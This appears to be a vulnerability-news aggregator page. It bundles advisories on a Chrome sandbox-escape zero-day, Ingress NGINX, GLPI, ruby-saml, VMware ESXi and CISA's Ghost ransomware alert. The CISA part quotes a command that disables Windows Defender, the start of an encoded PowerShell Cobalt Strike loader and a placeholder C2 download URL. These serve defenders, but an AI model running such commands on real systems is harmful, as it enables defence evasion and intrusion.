Recent bundles

Kaspersky - Operation ForumTroll: APT attack with Google Chrome zero-day exploit chain

18 hours ago by Alexandre Dulaunoy

Operation ForumTroll exploits zero-days in Google Chrome | Securelist

25 Mar 2025

minute read

In mid-March 2025, Kaspersky technologies detected a wave of infections by previously unknown and highly sophisticated malware. In all cases, infection occurred immediately after the victim clicked on a link in a phishing email, and the attackers’ website was opened using the Google Chrome web browser. No further action was required to become infected.

All malicious links were personalized and had a very short lifespan. However, Kaspersky’s exploit detection and protection technologies successfully identified the zero-day exploit that was used to escape Google Chrome’s sandbox. We quickly analyzed the exploit code, reverse-engineered its logic, and confirmed that it was based on a zero-day vulnerability affecting the latest version of Google Chrome. We then reported the vulnerability to the Google security team. Our detailed report enabled the developers to quickly address the issue, and on March 25, 2025, Google released an update fixing the vulnerability and thanked us for discovering this attack.

Acknowledgement for finding CVE-2025-2783 (excerpt from security fixes included into Chrome 134.0.6998.177/.178)

We have discovered and reported dozens of zero-day exploits actively used in attacks, but this particular exploit is certainly one of the most interesting we’ve encountered. The vulnerability CVE-2025-2783 really left us scratching our heads, as, without doing anything obviously malicious or forbidden, it allowed the attackers to bypass Google Chrome’s sandbox protection as if it didn’t even exist. The cause of this was a logical error at the intersection of Google Chrome’s sandbox and the Windows operating system. We plan to publish the technical details of this vulnerability once the majority of users have installed the updated version of the browser that fixes it.

Our research is still ongoing, but judging by the functionality of the sophisticated malware used in the attack, it seems the attackers’ goal was espionage. The malicious emails contained invitations supposedly from the organizers of a scientific and expert forum, “Primakov Readings”, targeting media outlets and educational institutions in Russia. Based on the content of the emails, we dubbed the campaign Operation ForumTroll.

Example of a malicious email used in this campaign (translated from Russian)

At the time of writing, there’s no exploit active at the malicious link – it just redirects visitors to the official website of “Primakov Readings”. However, we strongly advise against clicking on any potentially malicious links.

The exploit we discovered was designed to run in conjunction with an additional exploit that enables remote code execution. Unfortunately, we were unable to obtain this second exploit, as in this particular case it would have required waiting for a new wave of attacks and exposing users to the risk of infection. Fortunately, patching the vulnerability used to escape the sandbox effectively blocks the entire attack chain.

All the attack artifacts analyzed so far indicate high sophistication of the attackers, allowing us to confidently conclude that a state-sponsored APT group is behind this attack.

We plan to publish a detailed report with technical details about the zero-day exploit, the sophisticated malware, and the attackers’ techniques.

Kaspersky products detect the exploits and malware used in this attack with the following verdicts:

Exploit.Win32.Generic
Trojan.Win64.Agent
Trojan.Win64.Convagent.gen
PDM:Exploit.Win32.Generic
PDM:Trojan.Win32.Generic
UDS:DangerousObject.Multi.Generic

Indicators of Compromise

primakovreadings[.]info

Latest Posts

Latest Webinars

Reports

In this article, we discuss the tools and TTPs used in the SideWinder APT’s attacks in H2 2024, as well as shifts in its targets, such as an increase in attacks against the maritime and logistics sectors.

Kaspersky researchers analyze EAGERBEE backdoor modules, revealing a possible connection to the CoughingDown APT actor.

While investigating an incident involving the BellaCiao .NET malware, Kaspersky researchers discovered a C++ version they dubbed “BellaCPP”.

Lazarus targets employees of a nuclear-related organization with a bunch of malware, such as MISTPEN, LPEClient, RollMid, CookieTime and a new modular backdoor CookiePlus.

Related vulnerabilities: cve-2025-2783

Ingress NGINX Controller for Kubernetes - Vulnerabilities fixed in controller-v1.12.1

1 day ago by Alexandre Dulaunoy

This release fixes the following CVEs:

Unfortunately, to fix CVE-2025-1974 it was necessary to disable the validation of the generated NGINX configuration during the validation of Ingress resources.

The resulting NGINX configuration is still checked before the actual loading, so that there are no failures of the underlying NGINX. However, invalid Ingress resources can lead to the NGINX configuration no longer being able to be updated.

To reduce such situations as far as possible, we therefore recommend enabling annotation validation and disabling snippet annotations. In case of doubt, such states can be determined from the logs of the Ingress NGINX Controller. Watch out for a line of dashes followed by "Error:" telling you what went wrong.

Related vulnerabilities: cve-2025-24513 cve-2025-24514 cve-2025-1097 cve-2025-1974 cve-2025-1098

Pre-authentication SQL injection to RCE in GLPI (CVE-2025-24799/CVE-2025-24801)

13 days ago by Alexandre Dulaunoy

Ref: https://blog.lexfo.fr/glpi-sql-to-rce.html

Several GLPI instances have been identified during Red Team engagements. The software is popular with French-speaking companies, some of those even expose their instances directly on the Internet. GLPI has been historically known to harbor multiple easy-to-find vulnerabilities, and because it is often connected to an Active Directory, finding a vulnerability on this application for Red Team engagements or internal infrastructure audits could lead to initial access to the internal network and the recovery of an active directory account.

2024-12-25 - Discovery of the vulnerability
2025-01-28 - Report of the vulnerability through Github Advisories
2025-01-28 - GLPI validates the report and assigns CVE-2025-24801 (exécution de code à distance)
2025-01-28 - GLPI validates the report and assigns CVE-2025-24799 (injection SQL)
2025-02-12 - Release patched version 10.0.18
2025-03-12 - Article released

Related vulnerabilities: cve-2025-24799 cve-2025-24801

Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0

13 days ago by Cédric Bonhomme

Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0. More information: https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/

Related vulnerabilities: cve-2024-45409 cve-2025-25292 cve-2024-9487 cve-2025-25291

Cyber Threat Overview 2024 from CERT-FR

15 days ago by Cédric Bonhomme

In this fourth edition of the Cyber Threat Overview, The French Cybersecurity Agency (ANSSI) addresses prevalent cybersecurity threats and the pivotal incidents which occurred in 2024. In line with the previous years, ANSSI estimates that attackers associated with the cybercriminal ecosystem and reputedly linked to China and Russia are three of the main threats facing both critical information systems and the national ecosystem as a whole.

This past year was also marked by the hosting of the Paris Olympic and Paralympic Games and by the number and the impact of vulnerabilities affecting information systems’ security edge devices.

CVE	SCORE CVSS3.x	ÉDITEUR	RISQUE	RÉFÉRENCE CERT-FR
CVE-2024-21887	9.1	IVANTI	Remote execution of arbitrary code, security policy and authentication bypass, access to restricted resources on different security and VPN gateways	CERTFR-2024-ALE-001, CERTFR-2024-AVI-0109, CERTFR-2024-AVI-0085
CVE-2023-46805	8.2	IVANTI	Remote execution of arbitrary code, security policy and authentication bypass on different security and VPN gateways	CERTFR-2024-ALE-0097
CVE-2024-21893	8.2	IVANTI
CVE-2024-3400	10.0	PALO ALTO NETWORKS	Remote execution of arbitrary code on different security devices	CERTFR-2024-ALE-006, CERTFR-2024-AVI-0307
CVE-2022-42475	9.8	FORTINET	Remote execution of arbitrary code on different SSL VPN gateways	CERTFR-2022-ALE-012, CERTFR-2022-AVI-1090
CVE-2024-8963	9.4	IVANTI	Remote execution of arbitrary code and security policy bypass on different security and VPN gateways	CERTFR-2024-ALE-013, CERTFR-2024-AVI-0796, CERTFR-2024-AVI-0917
CVE-2024-8190	7.2	IVANTI		CERTFR-2024-ALE-014, CERTFR-2024-AVI-0917
CVE-2024-47575	9.8	FORTINET	Remote execution of arbitrary code on different security devices	CERTFR-2024-ALE-014, CERTFR-2024-AVI-0917
CVE-2024-21762	9.8	FORTINET	Remote execution of arbitrary code on different security devices	CERTFR-2024-ALE-004, CERTFR-2024-AVI-0108
CVE-2021-44228	10.0	APACHE	Remote execution of arbitrary code	CERTFR-2021-ALE-022
CVE-2024-24919	8.6	CHECK POINT	Breach of data confidentiality	CERTFR-2024-ALE-008, CERTFR-2024-AVI-0449

VMSA-2025-0004: VMware ESXi, Workstation, and Fusion updates address multiple vulnerabilities (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226)

22 days ago by Alexandre Dulaunoy

Ref: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390

Impacted Products

VMware ESXi
VMware Workstation Pro / Player (Workstation)
VMware Fusion
VMware Cloud Foundation
VMware Telco Cloud Platform

Introduction

Multiple vulnerabilities in VMware ESXi, Workstation, and Fusion were privately reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products. 3a. VMCI heap-overflow vulnerability (CVE-2025-22224)

Description: VMware ESXi, and Workstation contain a TOCTOU (Time-of-Check Time-of-Use) vulnerability that leads to an out-of-bounds write. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.3.

Known Attack Vectors: A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host.

Resolution: To remediate CVE-2025-22224 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

Workarounds: None.

Additional Documentation: A supplemental FAQ was created for clarification. Please see: https://brcm.tech/vmsa-2025-0004

Acknowledgements: VMware would like to thank Microsoft Threat Intelligence Center for reporting this issue to us.

Notes: VMware by Broadcom has information to suggest that exploitation of CVE-2025-22224 has occurred in the wild. 3b. VMware ESXi arbitrary write vulnerability (CVE-2025-22225)

Description: VMware ESXi contains an arbitrary write vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.2.

Known Attack Vectors: A malicious actor with privileges within the VMX process may trigger an arbitrary kernel write leading to an escape of the sandbox.

Resolution: To remediate CVE-2025-22225 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

Workarounds: None.

Additional Documentation: A supplemental FAQ was created for clarification. Please see: https://brcm.tech/vmsa-2025-0004

Acknowledgements: VMware would like to thank Microsoft Threat Intelligence Center for reporting this issue to us.

Notes: VMware by Broadcom has information to suggest that exploitation of CVE-2025-22225 has occurred in the wild. 3c. HGFS information-disclosure vulnerability (CVE-2025-22226)

Description: VMware ESXi, Workstation, and Fusion contain an information disclosure vulnerability due to an out-of-bounds read in HGFS. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.1.

Known Attack Vectors: A malicious actor with administrative privileges to a virtual machine may be able to exploit this issue to leak memory from the vmx process.

Resolution: To remediate CVE-2025-22226 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

Workarounds: None.

Additional Documentation: A supplemental FAQ was created for clarification. Please see: https://brcm.tech/vmsa-2025-0004

Acknowledgements: VMware would like to thank Microsoft Threat Intelligence Center for reporting this issue to us.

Notes: VMware by Broadcom has information to suggest that exploitation of CVE-2025-22226 has occurred in the wild.

Related vulnerabilities: cve-2025-22225 cve-2025-22224 cve-2025-22226

StopRansomware: Ghost (Cring) Ransomware | CISA

23 days ago by Alexandre Dulaunoy

StopRansomware: Ghost (Cring) Ransomware | CISA

Cybersecurity Advisory

Release Date

February 19, 2025

Alert Code

AA25-050A

Actions for Organizations to Take Today to Mitigate Cyber Threats Related to Ghost (Cring) Ransomware Activity

Maintain regular system backups stored separately from the source systems which cannot be altered or encrypted by potentially compromised network devices [CPG 2.R].
Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe [CPG 2.F].
Common Vulnerabilities and Exposures (CVE): CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207.
Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization [CPG 2.F].
Require Phishing-Resistant MFA for access to all privileged accounts and email services accounts.

Summary

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.

Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.

Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.

Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied.

The FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16.1. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial Access

The FBI has observed Ghost actors obtaining initial access to networks by exploiting public facing applications that are associated with multiple CVEs [T1190]. Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207— commonly referred to as the ProxyShell attack chain).

Execution

Ghost actors have been observed uploading a web shell [T1505.003] to a compromised server and leveraging Windows Command Prompt [T1059.003] and/or PowerShell [T1059.001] to download and execute Cobalt Strike Beacon malware [T1105] that is then implanted on victim systems. Despite Ghost actors’ malicious implementation, Cobalt Strike is a commercially available adversary simulation tool often used for the purposes of testing an organization’s security controls.

Persistence

Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day. However, Ghost actors sporadically create new local [T1136.001] and domain accounts [T1136.002] and change passwords for existing accounts [T1098]. In 2024, Ghost actors were observed deploying web shells [T1505.003] on victim web servers.

Privilege Escalation

Ghost actors often rely on built in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user, often for the purpose of running Beacon a second time with elevated privileges [T1134.001].

Ghost actors have been observed using multiple open-source tools in an attempt at privilege escalation through exploitation [T1068] such as “SharpZeroLogon,” “SharpGPPPass,” “BadPotato,” and “GodPotato.” These privilege escalation tools would not generally be used by individuals with legitimate access and credentials.

See Table 1 for a descriptive listing of tools.

Credential Access

Ghost actors use the built in Cobalt Strike function “hashdump” or Mimikatz [T1003] to collect passwords and/or password hashes to aid them with unauthorized logins and privilege escalation or to pivot to other victim devices.

Defense Evasion

Ghost actors used their access through Cobalt Strike to display a list of running processes [T1057] to determine which antivirus software [T1518.001] is running so that it can be disabled [T1562.001]. Ghost frequently runs a command to disable Windows Defender on network connected devices. Options used in this command are: Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend.

Discovery

Ghost actors have been observed using other built-in Cobalt Strike commands for domain account discovery [T1087.002], open-source tools such as “SharpShares” for network share discovery [T1135], and “Ladon 911” and “SharpNBTScan” for remote systems discovery [T1018]. Network administrators would be unlikely to use these tools for network share or remote systems discovery.

Lateral Movement

Ghost actors used elevated access and Windows Management Instrumentation Command-Line (WMIC) [T1047] to run PowerShell commands on additional systems on the victim network— often for the purpose of initiating additional Cobalt Strike Beacon infections. The associated encoded string is a base 64 PowerShell command that always begins with: powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA… [T1132.001][T1564.003].

This string decodes to “$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“” and is involved with the execution of Cobalt Strike in memory on the target machine.

In cases where lateral movement attempts are unsuccessful, Ghost actors have been observed abandoning an attack on a victim.

Exfiltration

Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked. The FBI has observed limited downloading of data to Cobalt Strike Team Servers [T1041]. Victims and other trusted third parties have reported limited uses of Mega.nz [T1567.002] and installed web shells for similar limited data exfiltration. Note: The typical data exfiltration is less than hundreds of gigabytes of data.

Command and Control

Ghost actors rely heavily on Cobalt Strike Beacon malware and Cobalt Strike Team Servers for command and control (C2) operations, which function using hypertext transfer protocol (HTTP) and hypertext transfer protocol secure (HTTPS) [T1071.001]. Ghost rarely registers domains associated with their C2 servers. Instead, connections made to a uniform resource identifier (URI) of a C2 server, for the purpose of downloading and executing Beacon malware, directly reference the C2 server’s IP address. For example, http://xxx.xxx.xxx.xxx:80/Google.com where xxx.xxx.xxx.xxx represents the C2 server’s IP address.

For email communication with victims, Ghost actors use legitimate email services that include traffic encryption features. [T1573] Some examples of emails services that Ghost actors have been observed using are Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence.

Note: Table 2 contains a list of Ghost ransom email addresses.

Impact and Encryption

Ghost actors use Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. Ghost variants can be used to encrypt specific directories or the entire system’s storage [T1486]. The nature of executables’ operability is based on command line arguments used when executing the ransomware file. Various file extensions and system folders are excluded during the encryption process to avoid encrypting files that would render targeted devices inoperable.

These ransomware payloads clear Windows Event Logs [T1070.001], disable the Volume Shadow Copy Service, and delete shadow copies to inhibit system recovery attempts [T1490]. Data encrypted with Ghost ransomware variants cannot be recovered without the decryption key. Ghost actors hold the encrypted data for ransom and typically demand anywhere from tens to hundreds of thousands of dollars in cryptocurrency in exchange for decryption software [T1486].

The impact of Ghost ransomware activity varies widely on a victim-to-victim basis. Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices.

Indicators of Compromise (IOC)

Table 1 lists several tools and applications Ghost actors have used for their operations. The use of these tools and applications on a network should be investigated further.

Note: Authors of these tools generally state that they should not be used in illegal activity.

Table 1: Tools Leveraged by Ghost Actors

Name

Description

Source

Cobalt Strike

Cobalt Strike is penetration testing software. Ghost actors use an unauthorized version of Cobalt Strike.

N/A

IOX

Open-source proxy, used to establish a reverse proxy to a Ghost C2 server from an internal victim device.

github[.]com/EddieIvan01/iox

SharpShares.exe

SharpShares.exe is used to enumerate accessible network shares in a domain. Ghost actors use this primarily for host discovery.

github[.]com/mitchmoser/SharpShares

SharpZeroLogon.exe

SharpZeroLogon.exe attempts to exploit CVE-2020-1472 and is run against a target Domain Controller.

github[.]com/leitosama/SharpZeroLogon

SharpGPPPass.exe

SharpGPPPass.exe attempts to exploit CVE-2014-1812 and targets XML files created through Group Policy Preferences that may contain passwords.

N/A

SpnDump.exe

SpnDump.exe is used to list service principal name identifiers, which Ghost actors use for service and hostname enumeration.

N/A

NBT.exe

A compiled version of SharpNBTScan, a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration.

github[.]com/BronzeTicket/SharpNBTScan

BadPotato.exe

BadPotato.exe is an exploitation tool used for privilege escalation.

github[.]com/BeichenDream/BadPotato

God.exe

God.exe is a compiled version of GodPotato and is used for privilege escalation.

github[.]com/BeichenDream/GodPotato

HFS (HTTP File Server)

A portable web server program that Ghost actors use to host files for remote access and exfiltration.

rejitto[.]com/hfs

Ladon 911

A multifunctional scanning and exploitation tool, often used by Ghost actors with the MS17010 option to scan for SMB vulnerabilities associated with CVE-2017-0143 and CVE-2017-0144.

github[.]com/k8gege/Ladon

Web Shell

A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.

Slight variation of github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx

Table 2: MD5 File Hashes Associated with Ghost Ransomware Activity

File name

MD5 File Hash

Cring.exe

c5d712f82d5d37bb284acd4468ab3533

Ghost.exe

34b3009590ec2d361f07cac320671410

d9c019182d88290e5489cdf3b607f982

ElysiumO.exe

29e44e8994197bdb0c2be6fc5dfc15c2

c9e35b5c1dc8856da25965b385a26ec4

d1c5e7b8e937625891707f8b4b594314

Locker.exe

ef6a213f59f3fbee2894bd6734bbaed2

iex.txt, pro.txt (IOX)

ac58a214ce7deb3a578c10b97f93d9c3

x86.log (IOX)

c3b8f6d102393b4542e9f951c9435255

0a5c4ad3ec240fbfd00bdc1d36bd54eb

sp.txt (IOX)

ff52fdf84448277b1bc121f592f753c5

main.txt (IOX)

a2fd181f57548c215ac6891d000ec6b9

isx.txt (IOX)

625bd7275e1892eac50a22f8b4a6355d

sock.txt (IOX)

db38ef2e3d4d8cb785df48f458b35090

Ransom Email Addresses

Table 3 is a subset of ransom email addresses that have been included in Ghost ransom notes.

Table 3: Ransom Email Addresses

Email Addresses

[email protected]

Ransom Notes

Starting approximately in August 2024, Ghost actors began using TOX IDs in ransom notes as an alternative method for communicating with victims. For example: EFE31926F41889DBF6588F27A2EC3A2D7DEF7D2E9E0A1DEFD39B976A49C11F0E19E03998DBDA and E83CD54EAAB0F31040D855E1ED993E2AC92652FF8E8742D3901580339D135C6EBCD71002885B.

MITRE ATT&CK Tactics and Techniques

See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, version 16.1, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 4: Initial Access

Technique Title

Use

Exploit Public-Facing Application

T1190

Ghost actors exploit multiple vulnerabilities in public-facing systems to gain initial access to servers.

Table 5: Execution

Technique Title

Use

Windows Management Instrumentation

T1047

Ghost actors abuse WMI to run PowerShell scripts on other devices, resulting in their infection with Cobalt Strike Beacon malware.

PowerShell

T1059.001

Ghost actors use PowerShell for various functions including to deploy Cobalt Strike.

Windows Command Shell

T1059.003

Ghost actors use the Windows Command Shell to download malicious content on to victim servers.

Table 6: Persistence

Technique Title

Use

Account Manipulation

T1098

Ghost actors change passwords for already established accounts.

Local Account

T1136.001

Ghost actors create new accounts or makes modifications to local accounts.

Domain Account

T1136.002

Ghost actors create new accounts or makes modifications to domain accounts.

Web Shell

T1505.003

Ghost actors upload web shells to victim servers to gain access and for persistence.

Table 7: Privilege Escalation

Technique Title

Use

Exploitation for Privilege Escalation

T1068

Ghost actors use a suite of open source tools in an attempt to gain elevated privileges through exploitation of vulnerabilities.

Token Impersonation/Theft

T1134.001

Ghost actors use Cobalt Strike to steal process tokens of processes running at a higher privilege.

Table 8: Defense Evasion

Technique Title

Use

Application Layer Protocol: Web Protocols

T1071.001

Ghost actors use HTTP and HTTPS protocols while conducting C2 operations.

Impair Defenses: Disable or Modify Tools

T1562.001

Ghost actors disable antivirus products.

Hidden Window

T1564.003

Ghost actors use PowerShell to conceal malicious content within legitimate appearing command windows.

Table 9: Credential Access

Technique Title

Use

OS Credential Dumping

T1003

Ghost actors use Mimikatz and the Cobalt Strike “hashdump” command to collect passwords and password hashes.

Table 10: Discovery

Technique Title

Use

Remote System Discovery

T1018

Ghost actors use tools like Ladon 911 and ShapNBTScan for remote systems discovery.

Process Discovery

T1057

Ghost actors run a ps command to list running processes on an infected device.

Domain Account Discovery

T1087.002

Ghost actors run commands such as net group “Domain Admins” /domain to discover a list of domain administrator accounts.

Network Share Discovery

T1135

Ghost actors use various tools for network share discovery for the purpose of host enumeration.

Software Discovery

T1518

Ghost actors use their access to determine which antivirus software is running.

Security Software Discovery

T1518.001

Ghost actors run Cobalt Strike to enumerate running antivirus software.

Table 11: Exfiltration

Technique Title

Use

Exfiltration Over C2 Channel

T1041

Ghost actors use both web shells and Cobalt Strike to exfiltrate limited data.

Exfiltration to Cloud Storage

T1567.002

Ghost actors sometimes use legitimate cloud storage providers such as Mega.nz for malicious exfiltration operations.

Table 12: Command and Control

Technique Title

Use

Web Protocols

T1071.001

Ghost actors use Cobalt Strike Beacon malware and Cobalt Strike Team Servers which communicate over HTTP and HTTPS.

Ingress Tool Transfer

T1105

Ghost actors use Cobalt Strike Beacon malware to deliver ransomware payloads to victim servers.

Standard Encoding

T1132.001

Ghost actors use PowerShell commands to encode network traffic which reduces their likelihood of being detected during lateral movement.

Encrypted Channel

T1573

Ghost actors use encrypted email platforms to facilitate communications.

Table 13: Impact

Technique Title

Use

Data Encrypted for Impact

T1486

Ghost actors use ransomware variants Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe to encrypt victim files for ransom.

Inhibit System Recovery

T1490

Ghost actors delete volume shadow copies.

Mitigations

The FBI, CISA, and MS-ISAC recommend organizations reference their #StopRansomware Guide and implement the mitigations below to improve cybersecurity posture on the basis of the Ghost ransomware activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.

Maintain regular system backups that are known-good and stored offline or are segmented from source systems [CPG 2.R]. Ghost ransomware victims whose backups were unaffected by the ransomware attack were often able to restore operations without needing to contact Ghost actors or pay a ransom.
Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe [CPG 1.E].
Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization [CPG 2.F].
Require Phishing-Resistant MFA for access to all privileged accounts and email services accounts.
Train users to recognize phishing attempts.
Monitor for unauthorized use of PowerShell. Ghost actors leverage PowerShell for malicious purposes, although it is often a helpful tool that is used by administrators and defenders to manage system resources. For more information, visit NSA and CISA’s joint guidance on PowerShell best practices.
- Implement the principle of least privilege when granting permissions so that employees who require access to PowerShell are aligned with organizational business requirements.
Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access [CPG 3.A].
Identify, alert on, and investigate abnormal network activity. Ransomware activity generates unusual network traffic across all phases of the attack chain. This includes running scans to discover other network connected devices, running commands to list, add, or alter administrator accounts, using PowerShell to download and execute remote programs, and running scripts not usually seen on a network. Organizations that can successfully identify and investigate this activity are better able to interrupt malicious activity before ransomware is executed [CPG 3.A].
- Ghost actors run a significant number of commands, scripts, and programs that IT administrators would have no legitimate reason for running. Victims who have identified and responded to this unusual behavior have successfully prevented Ghost ransomware attacks.
Limit exposure of services by disabling unused ports such as, RDP 3398, FTP 21, and SMB 445, and restricting access to essential services through securely configured VPNs or firewalls.
Enhance email security by implementing advanced filtering, blocking malicious attachments, and enabling DMARC, DKIM, and SPF to prevent spoofing [CPG 2.M].

Validate Security Controls

In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.

To get started:

Select an ATT&CK technique described in this advisory (see Table 3 to Table 13).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

Reporting

Your organization has no obligation to respond or provide information back to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.

The FBI is interested in any information that can be shared, to include logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, and/or decryptor files.

Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, date of infection, date detected, initial attack vector, and host and network-based indicators.

The FBI, CISA, and MS-ISAC do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center ([email protected]) or by calling 1-844-Say-CISA (1-844-729-2472).

Disclaimer

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and the MS-ISAC.

Version History

February 19, 2025: Initial version.

This product is provided subject to this Notification and this Privacy & Use policy.

CVE	CVSS	Level	CVSS String	library
CVE-2017-12652	9.8	Critical	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H	libpng	Arbitrary Code Execution
CVE-2022-2068	9.8	Critical	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H	OpenSSL	Arbitrary Code Execution
CVE-2023-45853	9.8	Critical	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H	zlib	Information Disclosure
CVE-2020-14152	7.1	High	CVSS:3.1/AF4AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H	libjpeg	Denial of Service

Resolution

Update your version of the HP Universal Print Driver Series.

HP has provided updates to the HP Universal Print Driver Series. To obtain the updated version, go to www.hp.com/go/UPD.

https://support.hp.com/us-en/document/ish_11892982-11893015-16/hpsbpi03995

Related vulnerabilities: cve-2022-2068 cve-2023-45853 cve-2017-12652 cve-2020-14152

A Mirai botnet is attempting exploitation in the wild using a new (at least to us) set of CVEs

1 month ago by Cédric Bonhomme

A Mirai botnet is attempting exploitation in the wild using a new set of CVEs, focusing mostly on IoT devices. Includes:

Tenda CVE-2024-41473
Draytek CVE-2024-12987
HuangDou UTCMS V9 CVE-2024-9916
